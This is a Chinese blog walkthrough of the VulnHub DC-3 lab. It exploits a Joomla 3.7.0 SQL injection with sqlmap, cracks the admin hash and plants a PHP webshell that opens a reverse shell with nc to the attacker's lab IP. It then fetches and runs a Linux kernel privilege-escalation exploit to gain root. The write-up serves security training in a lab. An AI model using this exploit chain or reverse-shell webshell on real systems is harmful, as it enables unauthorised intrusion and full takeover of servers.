Welcome To My Humble Abode🍺.|

HKalpa

园龄:2年10个月粉丝:16关注:2

VulnHub-DC: 3

靶机地址:https://www.vulnhub.com/entry/dc-32,312/

一、确定目标

目标:there is only one flag, one entry point and no clues at all.

二、信息收集

1、主机发现

扫描网络得到目标主机IP(nmap不如arp-scan速度快)

arp-scan -l |grep 192.168.11

┌──(root㉿kali)-[~]
└─# arp-scan -l |grep 192.168.11
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.128
192.168.11.1   00:50:56:c0:00:08       VMware, Inc.
192.168.11.1   00:50:56:fe:d0:93       VMware, Inc. (DUP: 2)
192.168.11.140 00:0c:29:7f:c1:a7       VMware, Inc.
192.168.11.254 00:50:56:e2:e7:c6       VMware, Inc.

目标IP:192.168.11.140

2、端口扫描

使用nmap进行端口扫描

nmap -A -Pn -p0-65535 192.168.11.140

┌──(root㉿kali)-[~]
└─# nmap -A -Pn -p0-65535 192.168.11.140
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-16 08:32 CST
Nmap scan report for 192.168.11.140
Host is up (0.00082s latency).
Not shown: 65535 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open http   Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:7F:C1:A7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.82 ms 192.168.11.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.39 seconds

3、服务发现

目标主机仅开放80端口的Web服务,使用Joomla的CMS。

4、Web路径爆破

dirsearch -u 192.168.11.140 -e * -x 403

┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.11.140 -e * -x 403

_|. _ _ _ _ _ _|_   v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: admin | HTTP method: GET | Threads: 30 | Wordlist size: 9006

Output File: /root/.dirsearch/reports/192.168.11.140_23-03-16_09-43-26.txt

Error Log: /root/.dirsearch/logs/errors-23-03-16_09-43-26.log

Target: http://192.168.11.140/

[09:43:26] Starting:
[09:43:28] 200 -   18KB - /LICENSE.txt                                      
[09:43:29] 200 -   4KB - /README.txt                                      
[09:43:31] 301 - 324B - /administrator -> http://192.168.11.140/administrator/
[09:43:31] 200 -   2KB - /administrator/includes/                          
[09:43:31] 200 -   31B - /administrator/cache/                            
[09:43:31] 200 -   5KB - /administrator/                                  
[09:43:31] 301 - 329B - /administrator/logs -> http://192.168.11.140/administrator/logs/
[09:43:31] 200 -   31B - /administrator/logs/                              
[09:43:32] 301 - 314B - /bin -> http://192.168.11.140/bin/              
[09:43:32] 200 -   31B - /bin/                                            
[09:43:32] 301 - 316B - /cache -> http://192.168.11.140/cache/          
[09:43:32] 200 -   31B - /cache/                                          
[09:43:32] 200 -   31B - /cli/                                            
[09:43:32] 301 - 321B - /components -> http://192.168.11.140/components/
[09:43:32] 200 -   31B - /components/
[09:43:33] 200 -   0B - /configuration.php                                
[09:43:35] 200 -   3KB - /htaccess.txt                                    
[09:43:35] 301 - 317B - /images -> http://192.168.11.140/images/        
[09:43:35] 200 -   31B - /images/                                          
[09:43:35] 200 -   31B - /includes/                                        
[09:43:35] 301 - 319B - /includes -> http://192.168.11.140/includes/    
[09:43:35] 200 -   7KB - /index.php                                        
[09:43:36] 301 - 319B - /language -> http://192.168.11.140/language/    
[09:43:36] 200 -   31B - /layouts/                                        
[09:43:36] 301 - 320B - /libraries -> http://192.168.11.140/libraries/  
[09:43:36] 200 -   31B - /libraries/                                      
[09:43:36] 301 - 316B - /media -> http://192.168.11.140/media/          
[09:43:36] 200 -   31B - /media/                                          
[09:43:37] 301 - 318B - /modules -> http://192.168.11.140/modules/      
[09:43:37] 200 -   31B - /modules/                                        
[09:43:38] 301 - 318B - /plugins -> http://192.168.11.140/plugins/      
[09:43:38] 200 -   31B - /plugins/                                        
[09:43:39] 200 - 836B - /robots.txt.dist                                  
[09:43:41] 200 -   31B - /templates/                                      
[09:43:41] 200 -   0B - /templates/system/                                
[09:43:41] 200 -   31B - /templates/index.html                            
[09:43:41] 200 -   0B - /templates/beez3/                                
[09:43:41] 301 - 320B - /templates -> http://192.168.11.140/templates/  
[09:43:41] 200 -   0B - /templates/protostar/                            
[09:43:41] 301 - 314B - /tmp -> http://192.168.11.140/tmp/              
[09:43:41] 200 -   31B - /tmp/                                            
[09:43:42] 200 -   2KB - /web.config.txt                                  

Task Completed

读取/robots.txt.dist文件,发现后台登陆界面http://192.168.11.140/administrator/

猜测/templates/beez3/和/templates/protostar/应该是模板文件路径。

5、Web侦察

主页提示靶机只有一个flag,且获得flag必须获得root权限。

 

 

 

6、漏洞发现

使用Joomla专用扫描器joomscan扫描。

joomscan -u http://192.168.11.140/


  ____ _____ _____ __ __ ___   ___   __   _ _
  (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)(   )(_)( )(_)( )   ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                      (1337.today)

  --=[OWASP JoomScan
  +---++---==[Version : 0.0.7
  +---++---==[Update Date : [2018/09/23]
  +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
  --=[Code name : Self Challenge
  @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.11.140/ ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.11.140/administrator/components
http://192.168.11.140/administrator/modules
http://192.168.11.140/administrator/templates
http://192.168.11.140/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.11.140/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.11.140/                                                                      

可以看到joomla基本信息

通过searchsploit查看是否有可用EXP。

searchsploit Joomla 3.7.0

┌──(root㉿kali)-[~]
└─# searchsploit Joomla 3.7.0
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                             | Path
------------------------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                 | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                             | php/webapps/43488.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

可以看到有一个SQL注入漏洞和一个XSS漏洞,显然SQL注入漏洞才有更大可能使我们获取管理员账号密码登陆管理后台。

三、漏洞分析

查找并打开php/webapps/42033.txt文件

locate php/webapps/42033.txt

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

┌──(root㉿kali)-[~]
└─# locate php/webapps/42033.txt
/usr/share/exploitdb/exploits/php/webapps/42033.txt

┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
  Type: boolean-based blind
  Title: Boolean-based blind - Parameter replace (DUAL)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

  Type: error-based
  Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
  Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

发现文档要求使用以指定语句运行sqlmap进行数据库爆破。

四、漏洞利用

1、SQL注入

1.1 爆库

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

发现joomladb数据库

1.2 爆表

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks   |
| #__banners         |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments   |
| #__bsms_locations   |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series     |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers   |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics     |
| #__bsms_update     |
| #__categories       |
| #__contact_details |
| #__content_frontpag |
| #__content_rating   |
| #__content_types   |
| #__content         |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups   |
| #__fields_values   |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens   |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages       |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules         |
| #__newsfeeds       |
| #__overrider       |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas         |
| #__session         |
| #__tags             |
| #__template_styles |
| #__ucm_base         |
| #__ucm_content     |
| #__ucm_history     |
| #__update_sites_ext |
| #__update_sites     |
| #__updates         |
| #__user_keys       |
| #__user_notes       |
| #__user_profiles   |
| #__user_usergroup_m |
| #__usergroups       |
| #__users           |
| #__utf8_conversion |
| #__viewlevels       |
+---------------------+

发现#__users

1.3 爆字段

注:

  • 询问是否要使用公共列存在性检查时手动选择选y进行爆破,一路回车爆不出字段。

  • 回车键选择默认字典“/usr/share/sqlmap/data/txt/common columns.txt”

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

发现idnamepasswordusername字段。

1.4 查询字段内容

sqlmap -u "http://192.168.11.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,name,password,username" --dump -p list[fullordering]

Database: joomladb
Table: #__users
[1 entry]
+-----+-------+--------------------------------------------------------------+----------+
| id | name | password | username |
+-----+-------+--------------------------------------------------------------+----------+
| 629 | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin |
+-----+-------+--------------------------------------------------------------+----------+

发现密码经过HASH加密

2、HASH解密

2.1 保存密文

将密文保存到文件admin中

vi admin

┌──(root㉿kali)-[~]
└─# vi admin

┌──(root㉿kali)-[~]
└─# cat admin
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

2.2 使用john爆破

注:这里已经爆破了一遍,使用show参数查看

john admin

john -show admin

┌──(root㉿kali)-[~]
└─# john admin
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)

┌──(root㉿kali)-[~]
└─# john -show admin
?:snoopy

1 password hash cracked, 0 left

解密后的结果为:snoopy

账号:admin

密码:snoopy

2.3 登陆后台

尝试账号密码成功登陆管理后台http://192.168.11.140/administrator/

 

 

 

3、文件上传漏洞

3.1 上传文件

进入后台后,通过编辑模板上传webshell。

Extensions --> Templates --> Templates

 

 

 

编辑哪一个都可以,在这编辑Beez3模板。

 

 

 

在html目录下创建名为shell.php的webshell(创建+保存),内容为:

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.128 6666 >/tmp/f");?>

 

 

 

3.2 反弹SHELL

想要反弹webshell就要知道路径,前面Web路径爆破的时候爆出了模板路径,这里使用beez3模板,路径应该为:

http://192.168.11.140/templates/beez3/

发现为空白页,结合模板暴露的路径,尝试访问http://192.168.11.140/templates/beez3/html

 

 

 

发现了上传的shell.php文件,在kali中启动监听

nc -lvnp 6666

┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...

访问shell.php:

http://192.168.11.140/templates/beez3/html/shell.php

访问后成功建立连接拿到Shell。

┌──(root㉿kali)-[~]
└─# nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.11.128] from (UNKNOWN) [192.168.11.140] 37608
/bin/sh: 0: can't access tty; job control turned off
$

五、提权

无法进入root家目录,接下来就是想办法提权。

$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/templates/beez3/html
$ cd /root
/bin/sh: 6: cd: can't cd to /root

1、获取EXP

lsb_release命令补充:

LSB是Linux Standard Base(Linux标准库)的缩写, lsb_release命令用来与具体Linux发行版相关的Linux标准库信息。

注:LSB的译法有Linux标准库,Linux标准规范。CentOS最小化安装时默认没有这个命令,需要安装lsb_release使用命令。

1.1 查看系统内核

uname -a

lsb_release -a

$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial

1.2 查找内核漏洞

搜索基于4.4.0-21-generic内核的Ubuntu 16.04 LTS版本相关内核漏洞

searchsploit 4.4. Ubuntu 16.04

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalatio | linux/local/39772.txt

1.3 查找并查看文件

locate linux/local/39772.txt

vi /usr/share/exploitdb/exploits/linux/local/39772.txt

┌──(root㉿kali)-[~]
└─# locate linux/local/39772.txt
/usr/share/exploitdb/exploits/linux/local/39772.txt

┌──(root㉿kali)-[~]
└─# vi /usr/share/exploitdb/exploits/linux/local/39772.txt

1.4 下载EXP

在文件的最后一行可以找到EXP链接

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

┌──(root㉿kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2023-03-16 18:27:08-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7025 (6.9K) [application/octet-stream]
正在保存至: “39772.zip”

39772.zip 100%[=====================================================>] 6.86K --.-KB/s 用时 0.005s

2023-03-16 18:27:11 (1.33 MB/s) - 已保存 “39772.zip” [7025/7025])

2、EXP传至靶机

kali开启http服务

python -m http.server 8888

┌──(root㉿kali)-[~]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

靶机去/tmp目录下下载39772.zip文件

cd /tmp

wget 192.168.11.128:8888/39772.zip

$ cd /tmp
$ pwd
/tmp
$ wget http://192.168.11.128:8888/39772.zip
--2023-03-16 20:29:14-- http://192.168.11.128:8888/39772.zip
Connecting to 192.168.11.128:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

0K ...... 100% 1.92G=0s

2023-03-16 20:29:14 (1.92 GB/s) - '39772.zip' saved [7025/7025]

$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 16 20:29 f
drwx------ 3 root root 4096 Mar 15 19:16 systemd-private-eebb69eeaac946d088ae7471b81b6ac6-systemd-timesyncd.service-oySBFs
drwx------ 2 root root 4096 Mar 15 19:16 vmware-root

3、本地提权

接下来就是解压、编译、执行EXP来获得root权限

3.1 解压EXP

解压39772.zip之后进入文件夹39772,再对exploit.tar文件进行解压得到ebpf_mapfd_doubleput_exploit文件。

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

$ ls -l
total 16
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
prw-r--r-- 1 www-data www-data 0 Mar 17 10:22 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
$ ls -l
total 24
drwxr-xr-x 2 www-data www-data 4096 Aug 16 2016 39772
-rw-r--r-- 1 www-data www-data 7025 Mar 16 20:27 39772.zip
drwxrwxr-x 3 www-data www-data 4096 Aug 16 2016 __MACOSX
prw-r--r-- 1 www-data www-data 0 Mar 17 10:23 f
drwx------ 3 root root 4096 Mar 17 2023 systemd-private-69003323551d4c3aaddd256cfdcdc1a4-systemd-timesyncd.service-qyTaDk
drwx------ 2 root root 4096 Mar 17 2023 vmware-root
$ cd 39772
$ ls -l
total 32
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar
$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ ls -l
total 36
-rw-r--r-- 1 www-data www-data 10240 Aug 16 2016 crasher.tar
drwxr-x--- 2 www-data www-data 4096 Apr 26 2016 ebpf_mapfd_doubleput_exploit
-rw-r--r-- 1 www-data www-data 20480 Aug 16 2016 exploit.tar

3.2 执行EXP

  • 查看EXP发现没有执行权限,先赋予权限。

  • 进入ebpf_mapfd_doubleput_exploit目录

  • 编译compile.sh文件

  • 执行编译好的doubleput文件

  • 提示we have root privs now...获取root权限

ls -Rl ebpf_mapfd_doubleput_exploit

chmod -R 777 ebpf_mapfd_doubleput_exploit

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

$ ls -Rl ebpf_mapfd_doubleput_exploit
ebpf_mapfd_doubleput_exploit:
total 20
-rwxr-x--- 1 www-data www-data 155 Apr 26 2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26 2016 hello.c
-rw-r----- 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ chmod -R 777 ebpf_mapfd_doubleput_exploit
$ cd ebpf_mapfd_doubleput_exploit
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ls -l
total 52
-rwxrwxrwx 1 www-data www-data 155 Apr 26 2016 compile.sh
-rwxr-xr-x 1 www-data www-data 12336 Mar 17 10:36 doubleput
-rwxrwxrwx 1 www-data www-data 4188 Apr 26 2016 doubleput.c
-rwxr-xr-x 1 www-data www-data 8028 Mar 17 10:36 hello
-rwxrwxrwx 1 www-data www-data 2186 Apr 26 2016 hello.c
-rwxr-xr-x 1 www-data www-data 7524 Mar 17 10:36 suidhelper
-rwxrwxrwx 1 www-data www-data 255 Apr 26 2016 suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

至此成功提权。

六、后渗透(查找flag)

在root家目录中发现flag

cd /root

cat the-flag.txt

cd /root
ls -l
total 4
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)


Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

至此打靶完成,游戏结束OVO

本文作者:Kalpa

本文链接:https://www.cnblogs.com/HKalpa/p/17225373.html

版权声明:本作品采用本人所有操作均在实验环境下进行,用于其它用途后果自负,作者不承担相应的后果。中国大陆许可协议进行许可。

posted @   HKalpa  阅读(160)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起
  1. 1 绅士 薛之谦
绅士 - 薛之谦
00:00 / 00:00
An audio error has occurred.

作词 : 薛之谦

作曲 : 薛之谦

编曲 : 杨子朴

好久没见了什么角色呢

细心装扮着

白色衬衫的袖扣是你送的

尽量表现着像不在意的

频繁暴露了自欺欺人者

越掩饰越深刻

你说我说听说

忍着言不由衷的段落

我反正决定自己难过

我反正决定自己难过

我想摸你的头发

我想摸你的头发

只是简单的试探啊

我想给你个拥抱

我想给你个拥抱

像以前一样可以吗

你退半步的动作认真的吗

小小的动作伤害还那么大

我只能扮演个绅士

才能和你说说话

我能送你回家吗

我能送你回家吗

可能外面要下雨啦

我能给你个拥抱

我能给你个拥抱

像朋友一样可以吗

我忍不住从背后抱了一下

我忍不住从背后抱了一下

尺度掌握在不能说想你啊

你就当刚认识的绅士

闹了个笑话吧

尽量表现着善解人意的

尽量表现着善解人意的

频繁暴露了不欲人知的

越掩饰越深刻

想说听说别说

忍着言不由衷的段落

我反正注定留在角落

我想摸你的头发

我想摸你的头发

只是简单的试探啊

我想给你个拥抱

我想给你个拥抱

像以前一样可以吗

你退半步的动作认真的吗

你退半步的动作认真的吗

小小的动作伤害还那么大

我只能扮演个绅士

才能和你说说话

我能送你回家吗

我能送你回家吗

可能外面要下雨啦

我能给你个拥抱

像朋友一样可以吗

我忍不住从背后抱了一下

我忍不住从背后抱了一下

尺度掌握在不能说想你啊

你就当刚认识的绅士

闹了个笑话吧

你能给我只左手

你能给我只左手

牵你到马路那头吗

我会像以前一样

我会像以前一样

看着来往的车子啊

我们的距离在眉间皱了下

迅速还原成路人的样子啊

越有礼貌我越害怕

绅士要放得下

制作人 : 杨子朴

钢琴 : 杨子朴

吉他 : 杨子朴

合声 : 杨子朴

录音 : 金宇

混音 : 王用均